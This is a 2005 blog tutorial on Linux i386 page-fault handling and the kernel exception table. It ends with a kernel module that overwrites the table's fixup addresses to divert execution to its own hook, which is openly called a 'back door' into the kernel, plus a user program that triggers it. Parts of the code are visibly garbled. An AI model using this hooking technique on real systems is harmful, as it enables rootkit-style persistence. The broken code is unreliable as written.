Thursday, September 01, 2005

Back Door Entry - Getting hold of Kernel

Author: Gaurav Dhiman

Email: gaurav4lkg@gmail.com

This article talks about a way to break the kernel and getting hold of it for your use, in other words a way to hack a kernel. We will talk in respect to Linux Kernel. Well the same thing can be applied to other kernels as well.


We all know about the paging mechanisum to implement the virtual memory . Virtual memory is actually implemented using page on demand concept. This means we do not load the whole program in memory in one go, rather we keep on loading the required part of program as requested. Whenever the program refers the code or data which is not in memory, system do page-faults. Page fault is an exception generated by the MMU (Memory Management Unit) of system. Whenever the page-fault exception occurs CPU starts executing the page-fault handler code pointed out by the page-fault entry of IDT (Interrupt Descriptor Table). I wont discuss details about IDT in this article, will be writting seperator article for that. In short IDT is the kernel data structure (an array of pointers to kernel functions which handle hardware interrupts and system generated exceptions). The IDT is pointed by the CPU's IDTR register, so CPU knows where the IDT in memory is, that is why whenever any hardware interrupt or exception occures, system automatically switches to the relevant code whose pointer is placed in IDT entry. Coming back to page-faults, as told earlier page-fault is an exception and can occur in system at any time (in user space as well as in kernel space).

Details about Page-Fault Handler:
Page-fault handler handles following specific cases:

- When page fault occures in user space (user application code)
- user programme accessed a virtual memory address out of its virtual user address space. In this case page fault handler will generate SEGV and the process will be terminated.
- user programme accessed a valid virtual memory address which is in user virtual address space but virtual page related to it is not in momory (page table is not set). In this case page-fault handler will swap-in the required virtual page into memory, set the required page table entry and will return back to the page faulted instruction.

- When page fault occures in kernel space (kernel code)
- Kernel access the user space virtual address and the page related to that address is not avaliable in memory. In this case related page will be swapped in and the kernel will access it.
- Kernel tries to access the user space virtual address, whcih does not fall in user address space. In this case, kernel should not generate SEGV, rather it should handle this situation gracefully. This is the case which we will mainly focus on in this article ahead.

Entering a System Call:

Before going ahead, lets see some code related to system call invocation, it will help us in understanding this article in a better way.

When we do any system call using the library function, CPU switches to kernel mode also CPU is set to use the kernel stack of the process. As soon the execution context enters the kernel mode, CPU jumps to the ollowing kernel function, which can be found in arch/i386/kernel/entry.S file in kernel sources

pushl %eax # save orig_eax
testb $0x02,tsk_ptrace(%ebx) # PT_TRACESYS
jne tracesys
cmpl $(NR_syscalls),%eax
jae badsys
call *SYMBOL_NAME(sys_call_table)(,%eax,4)
movl %eax,EAX(%esp) # save the return value

In this function first of all processor context (state of all the registers in a processor) is saved on kernel specific stack and then GET_CURRENT macro is called to get the pointer of process descriptor (task_struct) of currently running process on the CPU. Finally the function related to the requested system call is called by picking the function pointer from sys_call_table (a global array of pointers in kernel - also known as system call table in general terms). From this point onwards the called function is responsible for serving the requested functionality to user space program.

Handling of page-faults in kernel space:

Kernel access the user space provide address, when user space programme makes a system call to fetch/put some user data into kernel, for e.g. write/ read system calls, ioctl system call etc. In these system calls one of the parameters is the user space address. Kernel put/fetch some data from user space with the help of some special kernel function which handles the page faults gracefully, if they occur. Some of the kernel functions used to copy data from/to user space are as follows:


Lets take a simple example of ioctl() system call. Use of ioctl() function in a user programme will be something like this

int on = 1;
ioctl(fd, FIONBIO, &on);

When ioctl system call is done, in kernel sys_ioctl() is called, which further down the line calls one of the above mentioned functions to fetch/put data in user provided buffer. Lets take an example of get_user() kernel function. This is implemented in kernel as a macro and you can find the implementation in include/asm/uaccess.h file of kernel sources.

#define get_user(x,ptr) \
({ int __ret_gu,__val_gu; \
switch(sizeof (*(ptr))) { \
case 1: __get_user_x(1,__ret_gu,__val_gu,ptr); break; \
case 2: __get_user_x(2,__ret_gu,__val_gu,ptr); break; \
case 4: __get_user_x(4,__ret_gu,__val_gu,ptr); break; \
default: __get_user_x(X,__ret_gu,__val_gu,ptr); break; \
} \
(x) = (__typeof__(*(ptr)))__val_gu; \
__ret_gu; \

In this macro "ptr" is the user provided address which can do a page fault. This macro further calls another macro "__get_user_x" depending upon the size of "ptr" pointer passed from user space to kernel. Size of this pointer tells kernel how much bytes need to be copied from/to user space accordingly the "__get_user_x" function is called.

Implementation of "__get_user_x" macro is as follows in kernel, can be found in include/asm/uaccess.h file:

#define __get_user_x(size,ret,x,ptr) \
__asm__ __volatile__("call __get_user_" #size \
:"=a" (ret),"=d" (x) \
:"0" (ptr))

This function uses the assembly code to invoke one of the following functions written in assembly language:


We will only see the implementation of one of these functions to under stand it better. Lets analyse what "__get_user_4()" assembly function do. Implementation of this function is as follows in linux kernel, you can find its code in arch/i386/lib/getuser.S assembly file

.align 4
.globl __get_user_4
addl $3,%eax
movl %esp,%edx
jc bad_get_user
andl $0xffffe000,%edx
cmpl addr_limit(%edx),%eax
jae bad_get_user
3: movl -3(%eax),%edx
xorl %eax,%eax

xorl %edx,%edx
movl $-14,%eax

.section __ex_table,"a"
.long 1b,bad_get_user
.long 2b,bad_get_user
.long 3b,bad_get_user

This is the actual code in kernel which actually gets the specific number of bytes (in this case 4 bytes are copied) from user space buffer to kernel buffer. In this while copying the data we might face a page-fault and as we are currently in kernel mode, we need to handle such page-faults gracefully. We will shortly discuss some kernel data structures which help in this.

In this function following instruction actually copies 4 bytes from address poited by EAX (pointer given by user space program) to CPU's EDX register.

3: movl -3(%eax),%edx

We can face a page fault while executing this instruction,now lets see how we handle that. For this kernel maintains a two dimentional array of poiters, which is known as exception table (__ex_table). This table have number of enteries and each entry contains two elements or in other words if we literally see it as table, it have number of rows and two columns. First column contains the address of kernel instruction which can page fault while accessing the user space address (in our case it will be address of above mov instruction). Second column of this table contains the address of fix up codewhich need to be called when page fault occurs on instruction whose address is stored in first column. So this table looks like following:

Exception Table
| page fault address 1 | fix up address 1 |
| page fault address 2 | fix up address 2 |
| page fault address 3 | fix up address 3 |
| page fault address 4 | fix up address 4 |
| page fault address 5 | fix up address 5 |
| page fault address 6 | fix up address 6 |
| page fault address 7 | fix up address 7 |

If we look at above assembly code of function __get_user_4(), we will find ".section" in it. This is a assembler directive whcih tells the assembler to place the following instruction in a specific section of executable. In above function we are dictating the assembler to place the address of faulting kernel instructions and there corresponding fix up codes in a __ex_table section of linux kernel binary.

Following assembly instructions put the address of faulting instruction and there corresponding fix up codes in exception talble (__ex_table section of linux kernel image).

.long 1b,bad_get_user
.long 2b,bad_get_user
.long 3b,bad_get_user

1b means the first lable 1 in backward direction, which is actually the faulting instruction that is the mov instruction we discussed earlier. "bad_get_user" is another assembly lable which serves as the fix up code and will be executed if page fault occurs while executing the instruction at 1b, 2b or 3b instructions.

This is all about the exception table and setting the enteries in it, but we must know how exception table is exactly used by page fault handler. All this is discussed in the following section.

Use of Exception Table in Page Fault Handler:

In Linux Kernel, page fault handler is the do_page_fault() function defined in arch/i386/mm/fault.c file of kernel sources.

Lets assume that page fault occurs while copying the data from user space to kernel space. Immediately the page fault handler will be executed by CPU and page fault handler will check if the page faulting instruction falls in user space or in kernel space (this determines is the page fault occured in user space program or while executing the kernel instruction). If it occured in kernel, page fault handler (do_page_fault() function) will simple call fixup_exception() kernel function.

if (fixup_exception(regs))

Implementation of fixup_exception() function can be found in arch/i386/mm/extable.c file of kernel sources.

int fixup_exception(struct pt_regs *regs)
const struct exception_table_entry *fixup;

fixup = search_exception_tables(regs->eip);
if (fixup) {
regs->eip = fixup->fixup;
return 1;

return 0;

fixup_exception() function looks for the faulting address (regs->eip) in the first column of exception table and if it find it, it sets the regs_eip to the address found in the second column (this is the address of fix up code). If we are not able to find the faulting address in exception table (this means that kernel access some wrong address for which kernel do not have any fixup code). In this case page fault handler must generate the OOPS (too famous in kernel world) and core dump the kernel image.

This is all about page faulting in kernel and there handling in linux. Nows lets explore the possiblities to exploit the exception table to get an redirect the execution to our malicious code. This would be interesting and wil give you a free hand to do anything in kernel once its compromised ;-)

Hack kernel using exception table:

As now we know what exception table is and what it contains, we can think of exploiting it for getting a back door entry into kernel. In simpler words, if we are able to replace the addresses in second column (addresss of fixup code) of exception table with our own function address, we can exceute our function just by generating a page fault in kernel and that is not too difficult (just pass a wrong address in ioctl or write/read system calls, thats it an you get control to your function). You must be thinking, it can not be that simple. Well, as now you know about page fault handler and exception table, it might seems an simple thing to you.

Lets have some practicle linux kernel module for it, which can show us how we can expoit this option. Following Linux Kernel Module, will replace the addresses in exception table and then we can generate a page fault by a simple user program.

Linux Kernel Module Code:

#ifndef __KERNEL__
#define __KERNEL__

#ifndef MODULE
#define MODULE

#define __START___EX_TABLE 0xc0261e20
#define __END___EX_TABLE 0xc0264548
#define BAD_GET_USER 0xc022f39c

unsigned long start_ex_table = __START___EX_TABLE;
unsigned long end_ex_table = __END___EX_TABLE;
unsigned long bad_get_user = BAD_GET_USER;

#include "linux/module.h"
#include "linux/kernel.h"
#include "linux/slab.h"

# define PDEBUG(fmt, args...) printk(KERN_DEBUG "[fixup] : " fmt, ##args)
# define PDEBUG(fmt, args...) do {} while(0)

MODULE_PARM(start_ex_table, "l");
MODULE_PARM(end_ex_table, "l");
MODULE_PARM(bad_get_user, "l");


struct old_ex_entry {
struct old_ex_entry *next;
unsigned long address;
unsigned long insn;
unsigned long fixup;

struct old_ex_entry *ex_old_table;

void hook(void)
printk(KERN_INFO "You did a Page Fault ..... \n");

void cleanup_module(void)
struct old_ex_entry *entry = ex_old_table;
struct old_ex_entry *tmp;

if (!entry)

while (entry) {
*(unsigned long *)entry->address = entry->insn;
*(unsigned long *)((entry->address) + sizeof(unsigned
long)) = entry->fixup;
tmp = entry->next;
entry = tmp;


int init_module(void)
unsigned long insn = start_ex_table;
unsigned long fixup;
struct old_ex_entry *entry, *last_entry;

ex_old_table = NULL;
PDEBUG(KERN_INFO "hook at address : %p\n", (void *)hook);

for(; insn <>

fixup = insn + sizeof(unsigned long);

if (*(unsigned long *)fixup == BAD_GET_USER) {

PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
(void *)insn, *(unsigned long *)insn,
*(unsigned long *)fixup);

entry = (struct old_ex_entry *)kmalloc(GFP_ATOMIC,
sizeof(struct old_ex_entry));

if (!entry){
if (ex_old_table) {
last_entry = ex_old_table;
ex_old_table = ex_old_table->next;
return -1;

entry->next = NULL;
entry->address = insn;
entry->insn = *(unsigned long *)insn;
entry->fixup = *(unsigned long *)fixup;

if (ex_old_table) {
last_entry = ex_old_table;

while(last_entry->next != NULL)
last_entry = last_entry->next;

last_entry->next = entry;
} else
ex_old_table = entry;

*(unsigned long *)fixup = (unsigned long)hook;

PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
(void *)insn, *(unsigned long *)insn,
*(unsigned long *)fixup);



return 0;


In above Linux Kernel Module (LKM), init_modulr function simply searches the exception table fora specific fixup function (bad_get_user() function) and whereever it finds the address of this function in exception table, it replaces it with our own function hook(). It saves the pointer to bad_get_user() function, so that we can reset the exception table to its original form while removing our kernel module.

Now a simple code which calls ioctl() with a bad argument.

#include "stdio.h"
#include "sys/types.h"
#include "sys/stat.h"
#include "fcntl.h"
#include "unistd.h"
#include "errno.h"
#include "sys/ioctl.h"

int main()
int fd;
int res;

fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU);
res = ioctl(fd, FIONBIO, NULL);
printf("result = %d errno = %d\n", res, errno);
return 0;


Now first load the LKM into system, then run the user program and see the /var/messages/log file, it will show you the string "You did a Page Fault ..... ". This string is printed by the hook() function of our module.

Now you can think what you can do with this, if in place you just printing the string in hook function, you do something important. You have the whole kerel world in front of you ;-)


Hope this article helps you in learning more about kernel. The intention of this article is not to hack the kernel, but rather to provide learning material for people who want to learn kernel programming.

Email: gaurav4lkg@gmail.com